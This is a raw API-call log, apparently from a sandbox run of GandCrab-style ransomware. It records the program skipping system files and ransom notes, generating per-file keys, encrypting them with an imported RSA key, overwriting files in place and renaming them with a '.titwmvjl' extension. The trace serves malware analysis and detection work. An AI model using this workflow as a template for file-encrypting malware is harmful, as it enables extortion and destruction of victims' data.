[0088.797] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.797] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\S7Vw5e-7gWds.odp") returned 77 [0088.797] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\S7Vw5e-7gWds.odp") returned 77 [0088.797] lstrcmpiW (lpString1="S7Vw5e-7gWds.odp", lpString2="desktop.ini") returned 1 [0088.797] lstrcmpiW (lpString1="S7Vw5e-7gWds.odp", lpString2="autorun.inf") returned 1 [0088.797] lstrcmpiW (lpString1="S7Vw5e-7gWds.odp", lpString2="ntuser.dat") returned 1 [0088.797] lstrcmpiW (lpString1="S7Vw5e-7gWds.odp", lpString2="iconcache.db") returned 1 [0088.797] lstrcmpiW (lpString1="S7Vw5e-7gWds.odp", lpString2="bootsect.bak") returned 1 [0088.797] lstrcmpiW (lpString1="S7Vw5e-7gWds.odp", lpString2="boot.ini") returned 1 [0088.797] lstrcmpiW (lpString1="S7Vw5e-7gWds.odp", lpString2="ntuser.dat.log") returned 1 [0088.797] lstrcmpiW (lpString1="S7Vw5e-7gWds.odp", lpString2="thumbs.db") returned -1 [0088.797] lstrcmpiW (lpString1="S7Vw5e-7gWds.odp", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0088.797] lstrcmpiW (lpString1="S7Vw5e-7gWds.odp", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0088.797] lstrcmpiW (lpString1="S7Vw5e-7gWds.odp", lpString2="KRAB-DECRYPT.html") returned 1 [0088.797] lstrcmpiW (lpString1="S7Vw5e-7gWds.odp", lpString2="CRAB-DECRYPT.html") returned 1 [0088.797] lstrcmpiW (lpString1="S7Vw5e-7gWds.odp", lpString2="KRAB-DECRYPT.txt") returned 1 [0088.797] lstrcmpiW (lpString1="S7Vw5e-7gWds.odp", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.797] lstrcmpiW (lpString1="S7Vw5e-7gWds.odp", lpString2="ntldr") returned 1 [0088.797] lstrcmpiW (lpString1="S7Vw5e-7gWds.odp", lpString2="NTDETECT.COM") returned 1 [0088.797] lstrcmpiW (lpString1="S7Vw5e-7gWds.odp", lpString2="Bootfont.bin") returned 1 [0088.797] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\S7Vw5e-7gWds.odp") returned 77 [0088.797] lstrlenW (lpString=".odp") returned 4 [0088.797] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.797] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".odp ") returned 5 [0088.797] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.797] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.798] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\S7Vw5e-7gWds.odp" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\is9ekw\\s7vw5e-7gwds.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0088.798] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.798] ReadFile (in: hFile=0x2c4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0088.799] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.799] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.799] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0088.800] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.800] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.800] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.800] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0088.800] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.801] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.801] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.801] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.801] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0088.802] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.802] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.802] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.802] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0088.802] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.802] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.802] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.803] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.803] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0088.804] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.804] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5037b8) returned 1 [0088.804] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.804] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0088.804] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.804] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0088.804] GetLastError () returned 0x0 [0088.805] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.805] CryptDestroyKey (hKey=0x5037b8) returned 1 [0088.805] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.805] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.805] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.805] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0088.806] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.806] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503238) returned 1 [0088.806] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.806] CryptGetKeyParam (in: hKey=0x503238, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0088.806] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.807] CryptEncrypt (in: hKey=0x503238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0088.807] GetLastError () returned 0x0 [0088.807] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.807] CryptDestroyKey (hKey=0x503238) returned 1 [0088.807] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.807] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.807] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0088.807] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0088.807] ReadFile (in: hFile=0x2c4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ecb4*=0x14c57, lpOverlapped=0x0) returned 1 [0088.814] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffeb3a9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.814] WriteFile (in: hFile=0x2c4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x14c57, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ec98*=0x14c57, lpOverlapped=0x0) returned 1 [0088.816] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.816] WriteFile (in: hFile=0x2c4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0088.817] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.820] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.821] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.821] CloseHandle (hObject=0x2c4) returned 1 [0088.822] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\S7Vw5e-7gWds.odp" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\is9ekw\\s7vw5e-7gwds.odp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\S7Vw5e-7gWds.odp.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\is9ekw\\s7vw5e-7gwds.odp.titwmvjl"), dwFlags=0x1) returned 1 [0088.822] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.822] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0088.822] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0088.822] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0088.822] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\TITWMVJL-DECRYPT.txt" [0088.822] lstrlenW (lpString=".titwmvjl") returned 9 [0088.822] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\TITWMVJL-DECRYPT.txt") returned 81 [0088.822] VirtualAlloc (lpAddress=0x0, dwSize=0xe2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.823] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 90 [0088.823] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\TITWMVJL-DECRYPT.txt") returned 81 [0088.823] lstrlenW (lpString=".txt") returned 4 [0088.823] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.823] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0088.823] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0088.823] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.823] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\TITWMVJL-DECRYPT.txt") returned 81 [0088.823] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\TITWMVJL-DECRYPT.txt") returned 81 [0088.823] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0088.823] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0088.823] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0088.823] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0088.823] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0088.823] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0088.823] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0088.823] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0088.823] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.823] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0088.823] lstrcmpW (lpString1="Why0.avi", lpString2=".") returned 1 [0088.824] lstrcmpW (lpString1="Why0.avi", lpString2="..") returned 1 [0088.824] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\", lpString2="Why0.avi" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\Why0.avi") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\Why0.avi" [0088.824] lstrlenW (lpString=".titwmvjl") returned 9 [0088.824] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\Why0.avi") returned 69 [0088.824] VirtualAlloc (lpAddress=0x0, dwSize=0xca, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.824] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\Why0.avi.titwmvjl") returned 78 [0088.824] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\Why0.avi") returned 69 [0088.824] lstrlenW (lpString=".avi") returned 4 [0088.824] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.824] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".avi ") returned 5 [0088.824] lstrcmpiW (lpString1=".avi", lpString2=".titwmvjl") returned -1 [0088.824] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.824] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\Why0.avi") returned 69 [0088.824] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\Why0.avi") returned 69 [0088.824] lstrcmpiW (lpString1="Why0.avi", lpString2="desktop.ini") returned 1 [0088.824] lstrcmpiW (lpString1="Why0.avi", lpString2="autorun.inf") returned 1 [0088.824] lstrcmpiW (lpString1="Why0.avi", lpString2="ntuser.dat") returned 1 [0088.824] lstrcmpiW (lpString1="Why0.avi", lpString2="iconcache.db") returned 1 [0088.824] lstrcmpiW (lpString1="Why0.avi", lpString2="bootsect.bak") returned 1 [0088.824] lstrcmpiW (lpString1="Why0.avi", lpString2="boot.ini") returned 1 [0088.824] lstrcmpiW (lpString1="Why0.avi", lpString2="ntuser.dat.log") returned 1 [0088.824] lstrcmpiW (lpString1="Why0.avi", lpString2="thumbs.db") returned 1 [0088.824] lstrcmpiW (lpString1="Why0.avi", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0088.824] lstrcmpiW (lpString1="Why0.avi", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0088.824] lstrcmpiW (lpString1="Why0.avi", lpString2="KRAB-DECRYPT.html") returned 1 [0088.824] lstrcmpiW (lpString1="Why0.avi", lpString2="CRAB-DECRYPT.html") returned 1 [0088.825] lstrcmpiW (lpString1="Why0.avi", lpString2="KRAB-DECRYPT.txt") returned 1 [0088.825] lstrcmpiW (lpString1="Why0.avi", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.825] lstrcmpiW (lpString1="Why0.avi", lpString2="ntldr") returned 1 [0088.825] lstrcmpiW (lpString1="Why0.avi", lpString2="NTDETECT.COM") returned 1 [0088.825] lstrcmpiW (lpString1="Why0.avi", lpString2="Bootfont.bin") returned 1 [0088.825] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\Why0.avi") returned 69 [0088.825] lstrlenW (lpString=".avi") returned 4 [0088.825] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.825] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".avi ") returned 5 [0088.825] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.825] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.825] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\Why0.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\is9ekw\\why0.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0088.826] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.826] ReadFile (in: hFile=0x2c4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0088.826] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.826] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.827] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0088.828] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.828] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.828] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.828] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0088.828] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.828] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.828] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.828] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.828] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0088.830] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.830] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.830] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.830] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0088.830] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.830] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.830] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.831] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.831] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0088.832] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.832] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503638) returned 1 [0088.832] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.832] CryptGetKeyParam (in: hKey=0x503638, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0088.832] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.832] CryptEncrypt (in: hKey=0x503638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0088.832] GetLastError () returned 0x0 [0088.832] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.833] CryptDestroyKey (hKey=0x503638) returned 1 [0088.833] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.833] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.833] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.833] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0088.834] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.834] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5037b8) returned 1 [0088.834] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.834] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0088.834] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.834] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0088.835] GetLastError () returned 0x0 [0088.835] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.835] CryptDestroyKey (hKey=0x5037b8) returned 1 [0088.835] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.835] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.835] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0088.835] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0088.835] ReadFile (in: hFile=0x2c4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ecb4*=0xbb0a, lpOverlapped=0x0) returned 1 [0088.841] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xffff44f6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.841] WriteFile (in: hFile=0x2c4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xbb0a, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ec98*=0xbb0a, lpOverlapped=0x0) returned 1 [0088.843] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.843] WriteFile (in: hFile=0x2c4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0088.844] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.848] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.848] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.848] CloseHandle (hObject=0x2c4) returned 1 [0088.848] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\Why0.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\is9ekw\\why0.avi"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\Why0.avi.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\is9ekw\\why0.avi.titwmvjl"), dwFlags=0x1) returned 1 [0088.849] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.849] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 